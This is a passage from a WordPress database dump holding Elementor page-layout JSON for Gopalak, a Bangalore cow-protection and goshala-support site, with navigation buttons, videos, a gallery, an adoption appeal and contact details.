Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11602,1926,'_elementor_page_assets','a:0:{}'),(11605,1927,'_elementor_edit_mode','builder'),(11606,1927,'_elementor_template_type','wp-page'),(11607,1927,'_elementor_version','3.7.8'),(11608,1927,'_wp_page_template','elementor_canvas'),(11609,1927,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11610,1927,'_elementor_page_assets','a:0:{}'),(11612,1928,'_elementor_edit_mode','builder'),(11613,1928,'_elementor_template_type','wp-page'),(11614,1928,'_elementor_version','3.7.8'),(11615,1928,'_wp_page_template','elementor_canvas'),(11616,1928,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK-COIN-2.0.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11617,1928,'_elementor_page_assets','a:0:{}'),(11619,1929,'_elementor_edit_mode','builder'),(11620,1929,'_elementor_template_type','wp-page'),(11621,1929,'_elementor_version','3.7.8'),(11622,1929,'_wp_page_template','elementor_canvas'),(11623,1929,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"ur